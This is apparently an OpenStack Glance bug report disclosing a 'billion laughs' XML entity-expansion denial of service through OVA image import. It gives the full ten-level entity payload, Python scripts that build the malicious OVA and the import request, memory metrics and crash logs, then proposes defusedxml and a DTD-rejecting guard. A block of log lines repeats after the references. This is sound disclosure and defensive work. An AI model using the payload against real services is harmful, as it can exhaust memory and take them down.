2016-09-20 00:23:10 |
Charles Neill |
bug |
added bug |
2016-09-20 00:25:42 |
Charles Neill |
description |
Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
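The expansion can be demonstrated safely with the stdlib parser and a scaled-down payload: three levels of tenfold nesting instead of ten. ElementTree expands the internally declared entities, so the tiny document below blows up to 1,000 copies of "lol"; with the full ten-level payload the same arithmetic yields 10^10 copies, roughly 30 GB of text from a ~1 KB file.

```python
import xml.etree.ElementTree as ET

# Same shape as the real payload, but only 3 levels of 10x expansion
# (10**3 entities instead of 10**10), so this is safe to run.
payload = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE lolz ['
    '<!ENTITY lol "lol">'
    '<!ENTITY lol1 "' + "&lol;" * 10 + '">'
    '<!ENTITY lol2 "' + "&lol1;" * 10 + '">'
    '<!ENTITY lol3 "' + "&lol2;" * 10 + '">'
    ']>'
    '<lolz>&lol3;</lolz>'
)

root = ET.fromstring(payload)
# The ~500-byte document expanded to 3,000 characters of text.
print(len(root.text))
```

(Recent expat versions add amplification limits that trip on multi-megabyte expansions, but they only activate above a sizable output threshold, and the Python 2.7 stack shown in the logs predates them entirely.)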
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
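The raw request above can be reproduced with a short Python 3 stdlib script. The endpoint and token are placeholders, exactly as in the raw request:

```python
import json
import urllib.request

GLANCE = "http://localhost:1338"  # glance-api endpoint (adjust for your devstack)
TOKEN = "[ADMIN TOKEN]"           # a valid admin-scoped token

def build_import_task(ova_url, name):
    """Build (but do not send) the POST /v2/tasks request shown above."""
    body = json.dumps({
        "type": "import",
        "input": {
            "import_from": ova_url,
            "import_from_format": "raw",
            "image_properties": {
                "disk_format": "raw",
                "container_format": "ova",
                "name": name,
            },
        },
    }).encode()
    return urllib.request.Request(
        GLANCE + "/v2/tasks",
        data=body,
        headers={
            "Content-Type": "application/json",
            "Accept": "application/json",
            "X-Auth-Token": TOKEN,
        },
        method="POST",
    )

# To actually fire the request against a running devstack:
# urllib.request.urlopen(build_import_task("http://127.0.0.1:9090/laugh.ova", "laugh"))
```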
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
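Steps 1 and 2 can also be done programmatically — an OVA is just a tar archive, so a few lines of Python generate the ten-level payload and package it:

```python
import tarfile

# Generate the OVF payload: entity lolN expands to ten copies of lol(N-1).
entities = ['<!ENTITY lol "lol">', '<!ELEMENT lolz (#PCDATA)>']
for i in range(1, 11):
    prev = "lol" if i == 1 else "lol%d" % (i - 1)
    entities.append('<!ENTITY lol%d "%s">' % (i, ("&%s;" % prev) * 10))

ovf = ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n%s\n]>\n<lolz>&lol10;</lolz>\n'
       % "\n".join(entities))

with open("laugh.ovf", "w") as f:
    f.write(ovf)

# An OVA is a plain tar archive containing the OVF (and usually disks).
with tarfile.open("laugh.ova", "w") as tar:
    tar.add("laugh.ovf")
```

This only builds the file; it never parses it, so it is safe to run anywhere.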
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request":
2016-09-20 00:18:50.060 12743 INFO eventlet.wsgi.server [req-7b00a8f9-9fd6-4434-9c8b-87cc88ae2c06 1fadb086cfd94c1d8ab9d554657054d1 3330be90ba344c34b34afc27de7e7195 - default default] 10.0.2.2 - - [20/Sep/2016 00:18:50] "POST /v2/tasks HTTP/1.1" 201 796 4.892790
2016-09-20 00:18:50.076 12743 INFO glance.domain [-] Task [6da2d2bc-0bf1-4063-be3c-f571a3f8bcac] status changing from processing to processing
2016-09-20 00:18:50.083 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: dcc1e3e9d69e4e69a3f1f3737fe62040 NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.120 12743 DEBUG glance.async.taskflow_executor [-] Taskflow executor picked up the execution of task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac of task type import _run /opt/stack/glance/glance/async/taskflow_executor.py:152
2016-09-20 00:18:50.202 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.sheepdog.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.204 12743 DEBUG glance_store.backend [-] Attempting to import store rbd _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.207 12743 DEBUG glance_store.backend [-] Attempting to import store http _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.210 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.214 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.http.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.215 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.rbd.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.218 12743 DEBUG glance_store.backend [-] Attempting to import store vmware _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.220 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.cinder.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.222 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.filesystem.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.223 12743 DEBUG glance_store.backend [-] Attempting to import store cinder _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.225 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.swift.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.227 12743 DEBUG glance_store.backend [-] Attempting to import store swift _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.230 12743 DEBUG glance_store.backend [-] Attempting to import store glance.store.vmware_datastore.Store _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.233 12743 DEBUG glance_store.backend [-] Attempting to import store sheepdog _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.236 12743 DEBUG glance_store.backend [-] Attempting to import store no_conf _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.239 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.243 12743 DEBUG glance_store.backend [-] Registering options for group glance_store register_opts /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:154
2016-09-20 00:18:50.244 12743 DEBUG glance_store.backend [-] Attempting to import store file _load_store /usr/local/lib/python2.7/dist-packages/glance_store/backend.py:225
2016-09-20 00:18:50.247 12743 DEBUG glance_store.capabilities [-] Store glance_store._drivers.filesystem.Store doesn't support updating dynamic storage capabilities. Please overwrite 'update_capabilities' method of the store to implement updating logics if needed. update_capabilities /usr/local/lib/python2.7/dist-packages/glance_store/capabilities.py:97
2016-09-20 00:18:50.269 12743 DEBUG glance.async.flows.introspect [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/introspect.py:92
2016-09-20 00:18:50.277 12743 DEBUG glance.async.flows.ovf_process [-] Flow: import with ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac on <glance.api.authorization.ImageRepoProxy object at 0x7f066ecdbf90> get_flow /opt/stack/glance/glance/async/flows/ovf_process.py:264
2016-09-20 00:18:50.691 12743 DEBUG glance.async.taskflow_executor [-] Flow 'import' (ead420f3-4e84-42e5-9a2b-c2b5752454f6) transitioned into state 'RUNNING' from state 'PENDING' _flow_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:140
2016-09-20 00:18:50.719 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.739 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property status for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.740 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property schema for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.742 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property file for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.745 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property direct_url for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.751 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property tags for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.753 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property locations for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.755 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property checksum for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.756 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property created_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.759 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property updated_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.761 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property visibility for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.763 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property self for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.765 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_disk for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.768 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property protected for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.769 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_ram for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.771 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property owner for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.772 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property virtual_size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.774 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property id for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.776 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.848 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: d07a0965d2fb40b895d029f52605e2de NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.854 12743 DEBUG glance.async.flows.base_import [-] Task 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac created image 586fe0b7-1b29-488a-a4b9-91958c446504 execute /opt/stack/glance/glance/async/flows/base_import.py:69
2016-09-20 00:18:50.876 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'SUCCESS' from state 'RUNNING' with result '586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:50.879 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.904 12743 DEBUG glance_store._drivers.filesystem [-] Wrote 10240 bytes to /home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 with checksum e892216d1977d1a07a1898cbf9f99a38 add /usr/local/lib/python2.7/dist-packages/glance_store/_drivers/filesystem.py:706
2016-09-20 00:18:50.907 12743 DEBUG oslo_concurrency.processutils [-] Running cmd (subprocess): qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:344
2016-09-20 00:18:52.582 12743 DEBUG oslo_concurrency.processutils [-] CMD "qemu-img info --output=json file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504" returned: 0 in 1.676s execute /usr/local/lib/python2.7/dist-packages/oslo_concurrency/processutils.py:374
2016-09-20 00:18:52.633 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'SUCCESS' from state 'RUNNING' with result 'file:///home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:52.640 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-OVF_Process-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (da37d5f2-52bd-46ca-bfc4-13a0f926afd3) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:52.670 12743 WARNING glance.async.flows.ovf_process [-] OVF properties config file "ovf-metadata.json" was not found.
2016-09-20 00:19:08.116 12744 DEBUG eventlet.wsgi.server [-] (12744) accepted ('10.0.2.2', 51290) server /usr/local/lib/python2.7/dist-packages/eventlet/wsgi.py:868
2016-09-20 00:19:08.200 12744 DEBUG glance.api.middleware.version_negotiation [-] Determining version of request: POST /v2/tasks Accept: application/json process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:46
2016-09-20 00:19:08.203 12744 DEBUG glance.api.middleware.version_negotiation [-] Using url versioning process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:58
2016-09-20 00:19:08.206 12744 DEBUG glance.api.middleware.version_negotiation [-] Matched version: v2 process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:70
2016-09-20 00:19:08.208 12744 DEBUG glance.api.middleware.version_negotiation [-] new path /v2/tasks process_request /opt/stack/glance/glance/api/middleware/version_negotiation.py:71
2016-09-20 00:19:09.610 11832 INFO glance.common.wsgi [-] Removed dead child 12744
2016-09-20 00:19:09.661 11832 DEBUG glance.common.wsgi [-] No stale children _verify_and_respawn_children /opt/stack/glance/glance/common/wsgi.py:548
2016-09-20 00:19:09.681 11832 CRITICAL glance [-] OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance Traceback (most recent call last):
2016-09-20 00:19:09.681 11832 ERROR glance File "/usr/local/bin/glance-api", line 10, in <module>
2016-09-20 00:19:09.681 11832 ERROR glance sys.exit(main())
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/cmd/api.py", line 92, in main
2016-09-20 00:19:09.681 11832 ERROR glance server.wait()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 626, in wait
2016-09-20 00:19:09.681 11832 ERROR glance self.wait_on_children()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 566, in wait_on_children
2016-09-20 00:19:09.681 11832 ERROR glance self._verify_and_respawn_children(pid, status)
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 558, in _verify_and_respawn_children
2016-09-20 00:19:09.681 11832 ERROR glance self.run_child()
2016-09-20 00:19:09.681 11832 ERROR glance File "/opt/stack/glance/glance/common/wsgi.py", line 639, in run_child
2016-09-20 00:19:09.681 11832 ERROR glance pid = os.fork()
2016-09-20 00:19:09.681 11832 ERROR glance OSError: [Errno 12] Cannot allocate memory
2016-09-20 00:19:09.681 11832 ERROR glance
g-api failed to start
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [4].
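Until that lands, the parse site could also refuse any document carrying a DTD, since entity bombs require an internal DTD subset. The sketch below is an illustrative stdlib-only guard (the byte-level scan for "<!DOCTYPE" is my own crude shorthand, not the defusedxml API — defusedxml hooks expat's doctype handler and should be preferred):

```python
import io
import xml.etree.ElementTree as ET

class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a document type declaration."""

def safe_iterparse(xml_bytes):
    # Entity expansion attacks need entities declared in an internal DTD
    # subset, so rejecting any DOCTYPE up front stops them. A byte scan
    # is crude (it would also trip on the string inside CDATA); a real
    # fix should use defusedxml.ElementTree instead.
    if b"<!DOCTYPE" in xml_bytes:
        raise DTDForbidden("DTD/entity declarations are not allowed in OVF")
    return ET.iterparse(io.BytesIO(xml_bytes))
```

With this guard in front of ET.iterparse(), the "laugh.ovf" payload is rejected before any expansion happens, while a DTD-free OVF descriptor parses normally.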
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://pypi.python.org/pypi/defusedxml
2016-09-20 00:18:50.753 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property locations for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.755 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property checksum for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.756 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property created_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.759 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property updated_at for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.761 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property visibility for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.763 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property self for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.765 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_disk for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.768 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property protected for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.769 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property min_ram for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.771 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property owner for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.772 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property virtual_size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.774 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property id for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.776 12743 DEBUG glance.common.scripts.image_import.main [-] Task ID 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac: Ignoring property size for setting base properties while creating Image. create_image /opt/stack/glance/glance/common/scripts/image_import/main.py:132
2016-09-20 00:18:50.848 12743 DEBUG oslo_messaging._drivers.amqpdriver [-] CAST unique_id: d07a0965d2fb40b895d029f52605e2de NOTIFY exchange 'glance' topic 'notifications.info' _send /usr/local/lib/python2.7/dist-packages/oslo_messaging/_drivers/amqpdriver.py:432
2016-09-20 00:18:50.854 12743 DEBUG glance.async.flows.base_import [-] Task 6da2d2bc-0bf1-4063-be3c-f571a3f8bcac created image 586fe0b7-1b29-488a-a4b9-91958c446504 execute /opt/stack/glance/glance/async/flows/base_import.py:69
2016-09-20 00:18:50.876 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-CreateImage-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (44a2ebaa-6825-4539-a874-0e1bfd3a94c5) transitioned into state 'SUCCESS' from state 'RUNNING' with result '586fe0b7-1b29-488a-a4b9-91958c446504' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:178
2016-09-20 00:18:50.879 12743 DEBUG glance.async.taskflow_executor [-] Task 'import-ImportToFS-6da2d2bc-0bf1-4063-be3c-f571a3f8bcac' (2f07c300-65b4-4dd5-a93a-87eaf8d388c6) transitioned into state 'RUNNING' from state 'PENDING' _task_receiver /usr/local/lib/python2.7/dist-packages/taskflow/listeners/logging.py:189
2016-09-20 00:18:50.904 12743 DEBUG glance_store._drivers.filesystem [-] Wrote 10240 bytes to /home/stack/work/586fe0b7-1b29-488a-a4b9-91958c446504 with checksum e892216d1977d1a07a1898cbf9f99a38 add /usr/local/lib/python2.7/dist-packages/glance_store/_drivers/filesystem.py:706
